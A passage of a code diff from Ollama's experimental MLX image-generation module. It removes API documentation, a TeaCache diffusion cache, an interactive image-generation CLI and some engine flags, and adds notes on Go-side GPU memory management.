+## Memory Management

-### OpenAI-Compatible Endpoint
+MLX Python/C++ uses scope-based memory management - arrays are freed when they go out of scope. Go's garbage collector is non-deterministic, so we can't rely on finalizers to free GPU memory promptly.

-```bash
-POST /v1/images/generations
+Instead, arrays are automatically tracked and freed on `Eval()`:
+
+```go
+// All arrays are automatically tracked when created
+x := mlx.Add(a, b)
+y := mlx.Matmul(x, w)
+
+// Eval frees non-kept arrays, evaluates outputs (auto-kept)
+mlx.Eval(y)
+
+// After copying to CPU, free the array
+data := y.Data()
+y.Free()
 ```

-**Request:**
-```json
-{
-  "model": "z-image",
-  "prompt": "a sunset over mountains",
-  "size": "1024x1024",
-  "response_format": "b64_json"
-}
-```
-
-**Response:**
-```json
-{
-  "created": 1704067200,
-  "data": [
-    {
-      "b64_json": "iVBORw0KGgo..."
-    }
-  ]
-}
-```
-
-### Example: cURL
-
-```bash
-curl http://localhost:11434/v1/images/generations \
-  -H "Content-Type: application/json" \
-  -d '{
-    "model": "z-image",
-    "prompt": "a white cat",
-    "size": "1024x1024"
-  }'
-```
-
-### Example: Save to File
-
-```bash
-curl -s http://localhost:11434/v1/images/generations \
-  -H "Content-Type: application/json" \
-  -d '{
-    "model": "z-image",
-    "prompt": "a white cat",
-    "size": "1024x1024"
-  }' | jq -r '.data[0].b64_json' | base64 -d > image.png
-```
-
-### Streaming Progress
-
-Enable streaming to receive progress updates via SSE:
-
-```bash
-curl http://localhost:11434/v1/images/generations \
-  -H "Content-Type: application/json" \
-  -d '{"model": "z-image", "prompt": "a sunset", "stream": true}'
-```
-
-Events:
-```
-event: progress
-data: {"step": 1, "total": 30}
-
-event: progress
-data: {"step": 2, "total": 30}
-...
-
-event: done
-data: {"created": 1704067200, "data": [{"b64_json": "..."}]}
-```
-
-## Parameters
-
-| Parameter | Type | Default | Description |
-|-----------|------|---------|-------------|
-| model | string | required | Model name |
-| prompt | string | required | Text description of image |
-| size | string | "1024x1024" | Image dimensions (WxH) |
-| n | int | 1 | Number of images (currently only 1 supported) |
-| response_format | string | "b64_json" | "b64_json" or "url" |
-| stream | bool | false | Enable progress streaming |
-
-## Requirements
-
- macOS with Apple Silicon (M1/M2/M3/M4)
- CUDA: tested on CUDA 12 Blackwell, more testing coming soon
- Sufficient VRAM (see model table above)
- Ollama built with MLX support
-
-## Limitations
-
- macOS only (uses MLX backend)
- Single image per request
- Fixed step count (30 steps)
- Modelfiles not yet supported (use `ollama create` from model directory)
-
---
-
-# Tensor Model Storage Format
-
-Tensor models store each tensor as a separate blob with metadata in the manifest. This enables faster downloads (parallel fetching) and deduplication (shared tensors are stored once).
-
-## Manifest Structure
-
-The manifest follows the standard ollama format with tensor-specific layer metadata:
-
-```json
-{
-  "schemaVersion": 2,
-  "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
-  "config": { "digest": "sha256:...", "size": 1234 },
-  "layers": [
-    {
-      "mediaType": "application/vnd.ollama.image.tensor",
-      "digest": "sha256:25b36eed...",
-      "size": 49807448,
-      "name": "text_encoder/model.layers.0.mlp.down_proj.weight",
-      "dtype": "BF16",
-      "shape": [2560, 9728]
-    },
-    {
-      "mediaType": "application/vnd.ollama.image.json",
-      "digest": "sha256:abc123...",
-      "size": 512,
-      "name": "text_encoder/config.json"
-    }
-  ]
-}
-```
-
-Each tensor layer includes:
- `name`: Path-style tensor name (e.g., `text_encoder/model.layers.0.mlp.down_proj.weight`)
- `dtype`: Data type (BF16, F32, etc.)
- `shape`: Tensor dimensions
-
-Config layers use the same path-style naming (e.g., `tokenizer/tokenizer.json`).
-
-## Blob Format
-
-Each tensor blob is a minimal safetensors file:
-
-```
-[8 bytes: header size (uint64 LE)]
-[~80 bytes: JSON header, padded to 8-byte alignment]
-[N bytes: raw tensor data]
-```
-
-Header contains a single tensor named `"data"`:
-
-```json
-{"data":{"dtype":"BF16","shape":[2560,9728],"data_offsets":[0,49807360]}}
-```
-
-## Why Include the Header?
-
-The ~88 byte safetensors header enables MLX's native `mlx_load_safetensors` function, which:
-
-1. **Uses mmap** - Maps file directly into memory, no copies
-2. **Zero-copy to GPU** - MLX reads directly from mapped pages
-3. **No custom code** - Standard MLX API, battle-tested
-
-Without the header, we'd need custom C++ code to create MLX arrays from raw mmap'd data. MLX's public API doesn't expose this - it always copies when creating arrays from external pointers.
-
-The overhead is negligible: 88 bytes per tensor = ~100KB total for a 13GB model (0.0007%).
-
-## Why Per-Tensor Blobs?
-
-**Deduplication**: Blobs are content-addressed by SHA256. If two models share identical tensors (same weights, dtype, shape), they share the same blob file.
-
-Example: Model A and Model B both use the same text encoder. The text encoder's 400 tensors are stored once, referenced by both manifests.
-
-```
-~/.ollama/models/
-  blobs/
-    sha256-25b36eed...  <- shared by both models
-    sha256-abc123...
-  manifests/
-    library/model-a/latest  <- references sha256-25b36eed
-    library/model-b/latest  <- references sha256-25b36eed
-```
-
-## Import Flow
-
-```
-cd ./weights/Z-Image-Turbo
-ollama create z-image
-
-1. Scan component directories (text_encoder/, transformer/, vae/)
-2. For each .safetensors file:
-   - Extract individual tensors
-   - Wrap each in minimal safetensors format (88B header + data)
-   - Write to blob store (SHA256 content-addressed)
-   - Add layer entry to manifest with path-style name
-3. Copy config files (*.json) as config layers
-4. Write manifest
-```
-
-## FP8 Quantization
-
-Z-Image supports FP8 quantization to reduce memory usage by ~50% while maintaining image quality.
-
-### Usage
-
-```bash
-cd ./weights/Z-Image-Turbo
-ollama create z-image-fp8 --quantize fp8
-```
-
-This quantizes weights during import. The resulting model will be ~15GB instead of ~31GB.
+Key points:

+- All created arrays are automatically tracked
+- `mlx.Eval(outputs...)` frees non-kept arrays, evaluates outputs (outputs auto-kept)
+- `mlx.Keep(arrays...)` marks arrays to survive multiple Eval cycles (for weights, caches)
+- Call `.Free()` when done with an array
--- a/x/imagegen/cache/teacache.go
+++ b/x/imagegen/cache/teacache.go
@@ -1,197 +0,0 @@
-//go:build mlx
-
-// Package cache provides caching mechanisms for diffusion model inference.
-package cache
-
-import (
-	"github.com/ollama/ollama/x/imagegen/mlx"
-)
-
-// TeaCache implements Timestep Embedding Aware Caching for diffusion models.
-// It caches the transformer output and reuses it when timestep values
-// are similar between consecutive steps.
-//
-// For CFG (classifier-free guidance), it caches pos and neg predictions
-// separately and always computes CFG fresh to avoid error amplification.
-//
-// Reference: "Timestep Embedding Tells: It's Time to Cache for Video Diffusion Model"
-// https://github.com/ali-vilab/TeaCache
-type TeaCache struct {
-	// Cached transformer output from last computed step (non-CFG mode)
-	cachedOutput *mlx.Array
-
-	// Cached CFG outputs (pos and neg separately)
-	cachedPosOutput *mlx.Array
-	cachedNegOutput *mlx.Array
-
-	// Previous timestep value for difference calculation
-	prevTimestep float32
-
-	// Accumulated difference for rescaling
-	accumulatedDiff float32
-
-	// Configuration
-	threshold      float32 // Threshold for recomputation decision
-	rescaleFactor  float32 // Model-specific rescaling factor
-	skipEarlySteps int     // Number of early steps to never cache
-
-	// Statistics
-	cacheHits   int
-	cacheMisses int
-}
-
-// TeaCacheConfig holds configuration for TeaCache.
-type TeaCacheConfig struct {
-	// Threshold for recomputation. Lower = more cache hits, potential quality loss.
-	// Recommended: 0.05-0.15 for image models
-	Threshold float32
-
-	// Rescale factor to adjust timestep embedding differences.
-	// Model-specific, typically 1.0-2.0
-	RescaleFactor float32
-
-	// SkipEarlySteps: number of early steps to always compute (never cache).
-	// Set to 2-3 for CFG mode to preserve structure. 0 = no skipping.
-	SkipEarlySteps int
-}
-
-// DefaultTeaCacheConfig returns default configuration for TeaCache.
-func DefaultTeaCacheConfig() *TeaCacheConfig {
-	return &TeaCacheConfig{
-		Threshold:     0.1,
-		RescaleFactor: 1.0,
-	}
-}
-
-// NewTeaCache creates a new TeaCache instance.
-func NewTeaCache(cfg *TeaCacheConfig) *TeaCache {
-	if cfg == nil {
-		cfg = DefaultTeaCacheConfig()
-	}
-	return &TeaCache{
-		threshold:      cfg.Threshold,
-		rescaleFactor:  cfg.RescaleFactor,
-		skipEarlySteps: cfg.SkipEarlySteps,
-	}
-}
-
-// ShouldCompute determines if we should compute the full forward pass
-// or reuse the cached output based on timestep similarity.
-//
-// Algorithm:
-// 1. First step always computes
-// 2. Subsequent steps compare |currTimestep - prevTimestep| * rescaleFactor
-// 3. If accumulated difference > threshold, compute new output
-// 4. Otherwise, reuse cached output
-func (tc *TeaCache) ShouldCompute(step int, timestep float32) bool {
-	// Always compute early steps (critical for structure)
-	// Check both regular cache and CFG cache
-	hasCachedOutput := tc.cachedOutput != nil || tc.HasCFGCache()
-	if step < tc.skipEarlySteps || step == 0 || !hasCachedOutput {
-		return true
-	}
-
-	// Compute absolute difference between current and previous timestep
-	diff := timestep - tc.prevTimestep
-	if diff < 0 {
-		diff = -diff
-	}
-
-	// Apply rescaling factor
-	scaledDiff := diff * tc.rescaleFactor
-
-	// Accumulate difference (helps track drift over multiple cached steps)
-	tc.accumulatedDiff += scaledDiff
-
-	// Decision based on accumulated difference
-	if tc.accumulatedDiff > tc.threshold {
-		tc.accumulatedDiff = 0 // Reset accumulator
-		return true
-	}
-
-	return false
-}
-
-// UpdateCache stores the computed output for potential reuse (non-CFG mode).
-func (tc *TeaCache) UpdateCache(output *mlx.Array, timestep float32) {
-	// Free previous cached output
-	if tc.cachedOutput != nil {
-		tc.cachedOutput.Free()
-	}
-
-	// Store new cached values
-	tc.cachedOutput = output
-	tc.prevTimestep = timestep
-	tc.cacheMisses++
-}
-
-// UpdateCFGCache stores pos and neg outputs separately for CFG mode.
-// This allows CFG to be computed fresh each step, avoiding error amplification.
-func (tc *TeaCache) UpdateCFGCache(posOutput, negOutput *mlx.Array, timestep float32) {
-	// Free previous cached outputs
-	if tc.cachedPosOutput != nil {
-		tc.cachedPosOutput.Free()
-	}
-	if tc.cachedNegOutput != nil {
-		tc.cachedNegOutput.Free()
-	}
-
-	// Store new cached values
-	tc.cachedPosOutput = posOutput
-	tc.cachedNegOutput = negOutput
-	tc.prevTimestep = timestep
-	tc.cacheMisses++
-}
-
-// GetCached returns the cached output (non-CFG mode).
-func (tc *TeaCache) GetCached() *mlx.Array {
-	tc.cacheHits++
-	return tc.cachedOutput
-}
-
-// GetCFGCached returns cached pos and neg outputs for CFG mode.
-func (tc *TeaCache) GetCFGCached() (pos, neg *mlx.Array) {
-	tc.cacheHits++
-	return tc.cachedPosOutput, tc.cachedNegOutput
-}
-
-// HasCFGCache returns true if CFG cache is available.
-func (tc *TeaCache) HasCFGCache() bool {
-	return tc.cachedPosOutput != nil && tc.cachedNegOutput != nil
-}
-
-// Arrays returns all arrays that should be kept alive.
-func (tc *TeaCache) Arrays() []*mlx.Array {
-	var arrays []*mlx.Array
-	if tc.cachedOutput != nil {
-		arrays = append(arrays, tc.cachedOutput)
-	}
-	if tc.cachedPosOutput != nil {
-		arrays = append(arrays, tc.cachedPosOutput)
-	}
-	if tc.cachedNegOutput != nil {
-		arrays = append(arrays, tc.cachedNegOutput)
-	}
-	return arrays
-}
-
-// Stats returns cache hit/miss statistics.
-func (tc *TeaCache) Stats() (hits, misses int) {
-	return tc.cacheHits, tc.cacheMisses
-}
-
-// Free releases all cached arrays.
-func (tc *TeaCache) Free() {
-	if tc.cachedOutput != nil {
-		tc.cachedOutput.Free()
-		tc.cachedOutput = nil
-	}
-	if tc.cachedPosOutput != nil {
-		tc.cachedPosOutput.Free()
-		tc.cachedPosOutput = nil
-	}
-	if tc.cachedNegOutput != nil {
-		tc.cachedNegOutput.Free()
-		tc.cachedNegOutput = nil
-	}
-}
--- a/x/imagegen/cli.go
+++ b/x/imagegen/cli.go
@@ -1,488 +0,0 @@
-// cli.go provides CLI commands for image generation models.
-//
-// TODO (jmorganca): Integrate these commands into cmd/cmd.go when stable.
-// Currently these are separate to keep experimental code isolated.
-
-package imagegen
-
-import (
-	"encoding/base64"
-	"errors"
-	"fmt"
-	"io"
-	"os"
-	"strconv"
-	"strings"
-	"time"
-
-	"github.com/spf13/cobra"
-
-	"github.com/ollama/ollama/api"
-	"github.com/ollama/ollama/envconfig"
-	"github.com/ollama/ollama/progress"
-	"github.com/ollama/ollama/readline"
-)
-
-// ImageGenOptions holds options for image generation.
-// These can be set via environment variables or interactive commands.
-type ImageGenOptions struct {
-	Width          int
-	Height         int
-	Steps          int
-	Seed           int
-	NegativePrompt string
-}
-
-// DefaultOptions returns the default image generation options.
-func DefaultOptions() ImageGenOptions {
-	return ImageGenOptions{
-		Width:  1024,
-		Height: 1024,
-		Steps:  0, // 0 means model default
-		Seed:   0, // 0 means random
-	}
-}
-
-// RegisterFlags adds image generation flags to the given command.
-// Flags are hidden since they only apply to image generation models.
-func RegisterFlags(cmd *cobra.Command) {
-	cmd.Flags().Int("width", 1024, "Image width")
-	cmd.Flags().Int("height", 1024, "Image height")
-	cmd.Flags().Int("steps", 0, "Denoising steps (0 = model default)")
-	cmd.Flags().Int("seed", 0, "Random seed (0 for random)")
-	cmd.Flags().String("negative", "", "Negative prompt")
-	// Hide from main flags section - shown in separate section via AppendFlagsDocs
-	cmd.Flags().MarkHidden("width")
-	cmd.Flags().MarkHidden("height")
-	cmd.Flags().MarkHidden("steps")
-	cmd.Flags().MarkHidden("seed")
-	cmd.Flags().MarkHidden("negative")
-}
-
-// AppendFlagsDocs appends image generation flags documentation to the command's usage template.
-func AppendFlagsDocs(cmd *cobra.Command) {
-	usage := `
-Image Generation Flags (experimental):
-      --width int      Image width
-      --height int     Image height
-      --steps int      Denoising steps
-      --seed int       Random seed
-      --negative str   Negative prompt
-`
-	cmd.SetUsageTemplate(cmd.UsageTemplate() + usage)
-}
-
-// RunCLI handles the CLI for image generation models.
-// Returns true if it handled the request, false if the caller should continue with normal flow.
-// Supports flags: --width, --height, --steps, --seed, --negative
-func RunCLI(cmd *cobra.Command, name string, prompt string, interactive bool, keepAlive *api.Duration) error {
-	// Get options from flags (with env var defaults)
-	opts := DefaultOptions()
-	if cmd != nil && cmd.Flags() != nil {
-		if v, err := cmd.Flags().GetInt("width"); err == nil && v > 0 {
-			opts.Width = v
-		}
-		if v, err := cmd.Flags().GetInt("height"); err == nil && v > 0 {
-			opts.Height = v
-		}
-		if v, err := cmd.Flags().GetInt("steps"); err == nil && v > 0 {
-			opts.Steps = v
-		}
-		if v, err := cmd.Flags().GetInt("seed"); err == nil && v != 0 {
-			opts.Seed = v
-		}
-		if v, err := cmd.Flags().GetString("negative"); err == nil && v != "" {
-			opts.NegativePrompt = v
-		}
-	}
-
-	if interactive {
-		return runInteractive(cmd, name, keepAlive, opts)
-	}
-
-	// One-shot generation
-	return generateImageWithOptions(cmd, name, prompt, keepAlive, opts)
-}
-
-// generateImageWithOptions generates an image with the given options.
-func generateImageWithOptions(cmd *cobra.Command, modelName, prompt string, keepAlive *api.Duration, opts ImageGenOptions) error {
-	client, err := api.ClientFromEnvironment()
-	if err != nil {
-		return err
-	}
-
-	req := &api.GenerateRequest{
-		Model:  modelName,
-		Prompt: prompt,
-		Width:  int32(opts.Width),
-		Height: int32(opts.Height),
-		Steps:  int32(opts.Steps),
-	}
-	if opts.Seed != 0 {
-		req.Options = map[string]any{"seed": opts.Seed}
-	}
-	if keepAlive != nil {
-		req.KeepAlive = keepAlive
-	}
-
-	// Show loading spinner until generation starts
-	p := progress.NewProgress(os.Stderr)
-	spinner := progress.NewSpinner("")
-	p.Add("", spinner)
-
-	var stepBar *progress.StepBar
-	var imageBase64 string
-	err = client.Generate(cmd.Context(), req, func(resp api.GenerateResponse) error {
-		// Handle progress updates using structured fields
-		if resp.Total > 0 {
-			if stepBar == nil {
-				spinner.Stop()
-				stepBar = progress.NewStepBar("Generating", int(resp.Total))
-				p.Add("", stepBar)
-			}
-			stepBar.Set(int(resp.Completed))
-		}
-
-		// Handle final response with image data
-		if resp.Done && resp.Image != "" {
-			imageBase64 = resp.Image
-		}
-
-		return nil
-	})
-
-	p.StopAndClear()
-	if err != nil {
-		return err
-	}
-
-	if imageBase64 != "" {
-		// Decode base64 and save to CWD
-		imageData, err := base64.StdEncoding.DecodeString(imageBase64)
-		if err != nil {
-			return fmt.Errorf("failed to decode image: %w", err)
-		}
-
-		// Create filename from prompt
-		safeName := sanitizeFilename(prompt)
-		if len(safeName) > 50 {
-			safeName = safeName[:50]
-		}
-		timestamp := time.Now().Format("20060102-150405")
-		filename := fmt.Sprintf("%s-%s.png", safeName, timestamp)
-
-		if err := os.WriteFile(filename, imageData, 0o644); err != nil {
-			return fmt.Errorf("failed to save image: %w", err)
-		}
-
-		displayImageInTerminal(filename)
-		fmt.Printf("Image saved to: %s\n", filename)
-	}
-
-	return nil
-}
-
-// runInteractive runs an interactive REPL for image generation.
-func runInteractive(cmd *cobra.Command, modelName string, keepAlive *api.Duration, opts ImageGenOptions) error {
-	client, err := api.ClientFromEnvironment()
-	if err != nil {
-		return err
-	}
-
-	// Preload the model with the specified keepalive
-	p := progress.NewProgress(os.Stderr)
-	spinner := progress.NewSpinner("")
-	p.Add("", spinner)
-
-	preloadReq := &api.GenerateRequest{
-		Model:     modelName,
-		KeepAlive: keepAlive,
-	}
-	if err := client.Generate(cmd.Context(), preloadReq, func(resp api.GenerateResponse) error {
-		return nil
-	}); err != nil {
-		p.StopAndClear()
-		return fmt.Errorf("failed to load model: %w", err)
-	}
-	p.StopAndClear()
-
-	scanner, err := readline.New(readline.Prompt{
-		Prompt:      ">>> ",
-		Placeholder: "Describe an image to generate (/help for commands)",
-	})
-	if err != nil {
-		return err
-	}
-
-	if envconfig.NoHistory() {
-		scanner.HistoryDisable()
-	}
-
-	for {
-		line, err := scanner.Readline()
-		switch {
-		case errors.Is(err, io.EOF):
-			fmt.Println()
-			return nil
-		case errors.Is(err, readline.ErrInterrupt):
-			if line == "" {
-				fmt.Println("\nUse Ctrl + d or /bye to exit.")
-			}
-			continue
-		case err != nil:
-			return err
-		}
-
-		line = strings.TrimSpace(line)
-		if line == "" {
-			continue
-		}
-
-		// Handle commands
-		switch {
-		case strings.HasPrefix(line, "/bye"):
-			return nil
-		case strings.HasPrefix(line, "/?"), strings.HasPrefix(line, "/help"):
-			printInteractiveHelp()
-			continue
-		case strings.HasPrefix(line, "/set "):
-			if err := handleSetCommand(line[5:], &opts); err != nil {
-				fmt.Fprintf(os.Stderr, "Error: %v\n", err)
-			}
-			continue
-		case strings.HasPrefix(line, "/show"):
-			printCurrentSettings(opts)
-			continue
-		case strings.HasPrefix(line, "/"):
-			fmt.Fprintf(os.Stderr, "Unknown command: %s (try /help)\n", line)
-			continue
-		}
-
-		// Generate image with current options
-		req := &api.GenerateRequest{
-			Model:  modelName,
-			Prompt: line,
-			Width:  int32(opts.Width),
-			Height: int32(opts.Height),
-			Steps:  int32(opts.Steps),
-		}
-		if opts.Seed != 0 {
-			req.Options = map[string]any{"seed": opts.Seed}
-		}
-		if keepAlive != nil {
-			req.KeepAlive = keepAlive
-		}
-
-		// Show loading spinner until generation starts
-		p := progress.NewProgress(os.Stderr)
-		spinner := progress.NewSpinner("")
-		p.Add("", spinner)
-
-		var stepBar *progress.StepBar
-		var imageBase64 string
-
-		err = client.Generate(cmd.Context(), req, func(resp api.GenerateResponse) error {
-			// Handle progress updates using structured fields
-			if resp.Total > 0 {
-				if stepBar == nil {
-					spinner.Stop()
-					stepBar = progress.NewStepBar("Generating", int(resp.Total))
-					p.Add("", stepBar)
-				}
-				stepBar.Set(int(resp.Completed))
-			}
-
-			// Handle final response with image data
-			if resp.Done && resp.Image != "" {
-				imageBase64 = resp.Image
-			}
-
-			return nil
-		})
-
-		p.StopAndClear()
-		if err != nil {
-			fmt.Fprintf(os.Stderr, "Error: %v\n", err)
-			continue
-		}
-
-		// Save image to current directory with descriptive name
-		if imageBase64 != "" {
-			// Decode base64 image data
-			imageData, err := base64.StdEncoding.DecodeString(imageBase64)
-			if err != nil {
-				fmt.Fprintf(os.Stderr, "Error decoding image: %v\n", err)
-				continue
-			}
-
-			// Create filename from prompt (sanitized)
-			safeName := sanitizeFilename(line)
-			if len(safeName) > 50 {
-				safeName = safeName[:50]
-			}
-			timestamp := time.Now().Format("20060102-150405")
-			filename := fmt.Sprintf("%s-%s.png", safeName, timestamp)
-
-			if err := os.WriteFile(filename, imageData, 0o644); err != nil {
-				fmt.Fprintf(os.Stderr, "Error saving image: %v\n", err)
-				continue
-			}
-
-			displayImageInTerminal(filename)
-			fmt.Printf("Image saved to: %s\n", filename)
-		}
-
-		fmt.Println()
-	}
-}
-
-// sanitizeFilename removes characters that aren't safe for filenames.
-func sanitizeFilename(s string) string {
-	s = strings.ToLower(s)
-	s = strings.ReplaceAll(s, " ", "-")
-	// Remove any character that's not alphanumeric or hyphen
-	var result strings.Builder
-	for _, r := range s {
-		if (r >= 'a' && r <= 'z') || (r >= '0' && r <= '9') || r == '-' {
-			result.WriteRune(r)
-		}
-	}
-	return result.String()
-}
-
-// printInteractiveHelp prints help for interactive mode commands.
-// TODO: reconcile /set commands with /set parameter in text gen REPL (cmd/cmd.go)
-func printInteractiveHelp() {
-	fmt.Fprintln(os.Stderr, "Commands:")
-	fmt.Fprintln(os.Stderr, "  /set width <n>     Set image width")
-	fmt.Fprintln(os.Stderr, "  /set height <n>    Set image height")
-	fmt.Fprintln(os.Stderr, "  /set steps <n>     Set denoising steps")
-	fmt.Fprintln(os.Stderr, "  /set seed <n>      Set random seed")
-	fmt.Fprintln(os.Stderr, "  /set negative <s>  Set negative prompt")
-	fmt.Fprintln(os.Stderr, "  /show              Show current settings")
-	fmt.Fprintln(os.Stderr, "  /bye               Exit")
-	fmt.Fprintln(os.Stderr)
-	fmt.Fprintln(os.Stderr, "Or type a prompt to generate an image.")
-	fmt.Fprintln(os.Stderr)
-}
-
-// printCurrentSettings prints the current image generation settings.
-func printCurrentSettings(opts ImageGenOptions) {
-	fmt.Fprintf(os.Stderr, "Current settings:\n")
-	fmt.Fprintf(os.Stderr, "  width:    %d\n", opts.Width)
-	fmt.Fprintf(os.Stderr, "  height:   %d\n", opts.Height)
-	fmt.Fprintf(os.Stderr, "  steps:    %d\n", opts.Steps)
-	fmt.Fprintf(os.Stderr, "  seed:     %d (0=random)\n", opts.Seed)
-	if opts.NegativePrompt != "" {
-		fmt.Fprintf(os.Stderr, "  negative: %s\n", opts.NegativePrompt)
-	}
-	fmt.Fprintln(os.Stderr)
-}
-
-// handleSetCommand handles /set commands to change options.
-func handleSetCommand(args string, opts *ImageGenOptions) error {
-	parts := strings.SplitN(args, " ", 2)
-	if len(parts) < 2 {
-		return fmt.Errorf("usage: /set <option> <value>")
-	}
-
-	key := strings.ToLower(parts[0])
-	value := strings.TrimSpace(parts[1])
-
-	switch key {
-	case "width", "w":
-		v, err := strconv.Atoi(value)
-		if err != nil || v <= 0 {
-			return fmt.Errorf("width must be a positive integer")
-		}
-		opts.Width = v
-		fmt.Fprintf(os.Stderr, "Set width to %d\n", v)
-	case "height", "h":
-		v, err := strconv.Atoi(value)
-		if err != nil || v <= 0 {
-			return fmt.Errorf("height must be a positive integer")
-		}
-		opts.Height = v
-		fmt.Fprintf(os.Stderr, "Set height to %d\n", v)
-	case "steps", "s":
-		v, err := strconv.Atoi(value)
-		if err != nil || v <= 0 {
-			return fmt.Errorf("steps must be a positive integer")
-		}
-		opts.Steps = v
-		fmt.Fprintf(os.Stderr, "Set steps to %d\n", v)
-	case "seed":
-		v, err := strconv.Atoi(value)
-		if err != nil {
-			return fmt.Errorf("seed must be an integer")
-		}
-		opts.Seed = v
-		fmt.Fprintf(os.Stderr, "Set seed to %d\n", v)
-	case "negative", "neg", "n":
-		opts.NegativePrompt = value
-		if value == "" {
-			fmt.Fprintln(os.Stderr, "Cleared negative prompt")
-		} else {
-			fmt.Fprintf(os.Stderr, "Set negative prompt to: %s\n", value)
-		}
-	default:
-		return fmt.Errorf("unknown option: %s (try /help)", key)
-	}
-	return nil
-}
-
-// displayImageInTerminal attempts to render an image inline in the terminal.
-// Supports iTerm2, Kitty, WezTerm, Ghostty, and other terminals with inline image support.
-// Returns true if the image was displayed, false otherwise.
-func displayImageInTerminal(imagePath string) bool {
-	// Check if terminal supports inline images
-	termProgram := os.Getenv("TERM_PROGRAM")
-	kittyWindowID := os.Getenv("KITTY_WINDOW_ID")
-	weztermPane := os.Getenv("WEZTERM_PANE")
-	ghostty := os.Getenv("GHOSTTY_RESOURCES_DIR")
-
-	// Read the image file
-	data, err := os.ReadFile(imagePath)
-	if err != nil {
-		return false
-	}
-
-	encoded := base64.StdEncoding.EncodeToString(data)
-
-	switch {
-	case termProgram == "iTerm.app" || termProgram == "WezTerm" || weztermPane != "":
-		// iTerm2/WezTerm inline image protocol
-		// ESC ] 1337 ; File = [arguments] : base64 BEL
-		fmt.Printf("\033]1337;File=inline=1;preserveAspectRatio=1:%s\a\n", encoded)
-		return true
-
-	case kittyWindowID != "" || ghostty != "" || termProgram == "ghostty":
-		// Kitty graphics protocol (also used by Ghostty)
-		// Send in chunks for large images
-		const chunkSize = 4096
-		for i := 0; i < len(encoded); i += chunkSize {
-			end := min(i+chunkSize, len(encoded))
-			chunk := encoded[i:end]
-
-			if i == 0 {
-				// First chunk: a=T (transmit), f=100 (PNG), m=1 (more chunks follow) or m=0 (last chunk)
-				more := 1
-				if end >= len(encoded) {
-					more = 0
-				}
-				fmt.Printf("\033_Ga=T,f=100,m=%d;%s\033\\", more, chunk)
-			} else if end >= len(encoded) {
-				// Last chunk
-				fmt.Printf("\033_Gm=0;%s\033\\", chunk)
-			} else {
-				// Middle chunk
-				fmt.Printf("\033_Gm=1;%s\033\\", chunk)
-			}
-		}
-		fmt.Println()
-		return true
-
-	default:
-		return false
-	}
-}
--- a/x/imagegen/cmd/engine/README.md
+++ b/x/imagegen/cmd/engine/README.md
@@ -1,35 +0,0 @@
-# MLX Engine
-
-Experimental MLX backend for running models on Apple Silicon and CUDA.
-
-## Build
-
-```bash
-go build -tags mlx -o engine ./x/imagegen/cmd/engine
-```
-
-## Text Generation
-
-```bash
-./engine -model /path/to/model -prompt "Hello" -max-tokens 100
-```
-
-Options:
-
- `-temperature` - sampling temperature (default 0.7)
- `-top-p` - nucleus sampling (default 0.9)
- `-top-k` - top-k sampling (default 40)
-
-Supports: Llama, Gemma3, GPT-OSS
-
-## Image Generation
-
-```bash
-./engine -zimage -model /path/to/z-image -prompt "a cat" -output cat.png
-```
-
-Options:
-
- `-width`, `-height` - image dimensions (default 1024x1024)
- `-steps` - denoising steps (default 9)
- `-seed` - random seed (default 42)
--- a/x/imagegen/cmd/engine/generate.go
+++ b/x/imagegen/cmd/engine/generate.go
@@ -65,12 +65,12 @@ func (s *utf8Streamer) Flush() string {
 	return result
 }

+func init() {
+	generationStream = mlx.NewStream()
+}
+
 // withStream runs fn with the generation stream as default
 func withStream(fn func()) {
-	// Lazy initialization of generationStream
-	if generationStream == nil {
-		generationStream = mlx.NewStream()
-	}
 	orig := mlx.GetDefaultStream()
 	mlx.SetDefaultStream(generationStream)
 	fn()
--- a/x/imagegen/cmd/engine/main.go
+++ b/x/imagegen/cmd/engine/main.go
@@ -7,17 +7,12 @@ import (
 	"encoding/json"
 	"flag"
 	"fmt"
-	"image"
-	_ "image/jpeg"
-	_ "image/png"
 	"log"
 	"os"
 	"path/filepath"
 	"runtime/pprof"

-	"github.com/ollama/ollama/x/imagegen"
 	"github.com/ollama/ollama/x/imagegen/mlx"
-	"github.com/ollama/ollama/x/imagegen/models/flux2"
 	"github.com/ollama/ollama/x/imagegen/models/gemma3"
 	"github.com/ollama/ollama/x/imagegen/models/gpt_oss"
 	"github.com/ollama/ollama/x/imagegen/models/llama"
@@ -51,9 +46,9 @@ func main() {
 	imagePath := flag.String("image", "", "Image path for multimodal models")

 	// Image generation params
-	width := flag.Int("width", 0, "Image width (0 = auto from input or 1024)")
-	height := flag.Int("height", 0, "Image height (0 = auto from input or 1024)")
-	steps := flag.Int("steps", 0, "Denoising steps (0 = model default)")
+	width := flag.Int("width", 1024, "Image width")
+	height := flag.Int("height", 1024, "Image height")
+	steps := flag.Int("steps", 9, "Denoising steps")
 	seed := flag.Int64("seed", 42, "Random seed")
 	out := flag.String("output", "output.png", "Output path")

@@ -66,16 +61,12 @@ func main() {

 	// Legacy mode flags
 	zimageFlag := flag.Bool("zimage", false, "Z-Image generation")
-	flux2Flag := flag.Bool("flux2", false, "FLUX.2 Klein generation")
 	qwenImage := flag.Bool("qwen-image", false, "Qwen-Image text-to-image generation")
 	qwenImageEdit := flag.Bool("qwen-image-edit", false, "Qwen-Image-Edit image editing")
 	var inputImages stringSlice
 	flag.Var(&inputImages, "input-image", "Input image for image editing (can be specified multiple times)")
 	negativePrompt := flag.String("negative-prompt", "", "Negative prompt for CFG (empty = no CFG, matching Python)")
 	cfgScale := flag.Float64("cfg-scale", 4.0, "CFG scale for image editing")
-	teaCache := flag.Bool("teacache", false, "Enable TeaCache for faster inference")
-	teaCacheThreshold := flag.Float64("teacache-threshold", 0.1, "TeaCache threshold (lower = more aggressive caching)")
-	fusedQKV := flag.Bool("fused-qkv", false, "Enable fused QKV projection for faster attention")

 	flag.Parse()

@@ -84,11 +75,6 @@ func main() {
 		return
 	}

-	// Check if MLX initialized successfully
-	if !mlx.IsMLXAvailable() {
-		log.Fatalf("MLX initialization failed: %v", mlx.GetMLXInitError())
-	}
-
 	// CPU profiling
 	if *cpuProfile != "" {
 		f, err := os.Create(*cpuProfile)
@@ -112,56 +98,14 @@ func main() {
 			log.Fatal(loadErr)
 		}
 		var img *mlx.Array
-		img, err = m.GenerateFromConfig(context.Background(), &zimage.GenerateConfig{
-			Prompt:            *prompt,
-			NegativePrompt:    *negativePrompt,
-			CFGScale:          float32(*cfgScale),
-			Width:             int32(*width),
-			Height:            int32(*height),
-			Steps:             *steps,
-			Seed:              *seed,
-			CapturePath:       *gpuCapture,
